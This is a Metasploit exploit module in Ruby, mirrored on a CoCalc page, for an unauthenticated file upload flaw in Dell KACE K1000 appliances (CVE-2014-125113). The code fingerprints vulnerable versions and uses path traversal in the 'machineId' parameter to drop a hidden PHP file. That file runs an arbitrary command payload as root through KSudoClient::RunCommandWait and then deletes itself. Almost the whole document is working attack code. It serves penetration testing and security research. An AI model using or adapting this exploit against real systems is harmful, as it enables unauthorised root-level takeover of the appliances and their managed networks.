Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/dell_kace_k1000_upload.rb
33323 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Dell KACE K1000 File Upload',

16
        'Description' => %q{

17
          This module exploits a file upload vulnerability in Kace K1000

18
          versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547

19
          which allows unauthenticated users to execute arbitrary commands

20
          under the context of the 'www' user.

21


22
          This module also abuses the 'KSudoClient::RunCommandWait' function

23
          to gain root privileges.

24


25
          This module has been tested successfully with Dell KACE K1000

26
          version 5.3.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Privileged' => true,

30
        'Platform' => 'unix', # FreeBSD

31
        'Arch' => ARCH_CMD,

32
        'Author' => [

33
          'Bradley Austin (steponequit)', # Initial discovery and exploit

34
          'bcoles', # Metasploit

35
        ],

36
        'References' => [

37
          ['CVE', '2014-125113'],

38
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']

39
        ],

40
        'Payload' => {

41
          'Space' => 1024,

42
          'BadChars' => "\x00\x27",

43
          'DisableNops' => true,

44
          'Compat' =>

45
                        {

46
                          'PayloadType' => 'cmd',

47
                          'RequiredCmd' => 'generic perl'

48
                        }

49
        },

50
        'DefaultTarget' => 0,

51
        'Targets' => [

52
          ['Automatic Targeting', { 'auto' => true }]

53
        ],

54
        'DisclosureDate' => '2014-03-07',

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62
  end

63


64
  def check

65
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))

66
    unless res

67
      vprint_error('Connection failed')

68
      return Exploit::CheckCode::Unknown

69
    end

70
    if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000'

71
      if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/

72
        vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}")

73
        if $1.to_i == 5 && $2.to_i <= 3                         # 5.0 to 5.3

74
          return Exploit::CheckCode::Vulnerable

75
        elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849  # 5.4 prior to 5.4.76849

76
          return Exploit::CheckCode::Vulnerable

77
        elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547  # 5.5 prior to 5.5.90547

78
          return Exploit::CheckCode::Vulnerable

79
        end

80


81
        return Exploit::CheckCode::Safe

82
      end

83
      return Exploit::CheckCode::Detected

84
    end

85
    Exploit::CheckCode::Safe

86
  end

87


88
  def exploit

89
    # upload payload

90
    fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"

91
    payload_path = "/kbox/kboxwww/tmp/"

92
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"

93
    print_status("Uploading #{fname} (#{post_data.length} bytes)")

94
    res = send_request_cgi(

95
      'uri' => normalize_uri('service', 'kbot_upload.php'),

96
      'method' => 'POST',

97
      'vars_get' => Hash[{

98
        'filename' => fname,

99
        'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",

100
        'checksum' => 'SCRAMBLE',

101
        'mac' => rand_text_alphanumeric(rand(8) + 5),

102
        'kbotId' => rand_text_alphanumeric(rand(8) + 5),

103
        'version' => rand_text_alphanumeric(rand(8) + 5),

104
        'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5)

105
      }.to_a.shuffle],

106
      'data' => post_data

107
    )

108


109
    unless res

110
      fail_with(Failure::Unreachable, 'Connection failed')

111
    end

112


113
    if res.code && res.code == 200

114
      print_good('Payload uploaded successfully')

115
    else

116
      fail_with(Failure::UnexpectedReply, 'Unable to upload payload')

117
    end

118


119
    # execute payload

120
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))

121


122
    unless res

123
      fail_with(Failure::Unreachable, 'Connection failed')

124
    end

125


126
    if res.code && res.code == 200

127
      print_good('Payload executed successfully')

128
    elsif res.code && res.code == 404

129
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")

130
    else

131
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')

132
    end

133
  end

134
end

135


136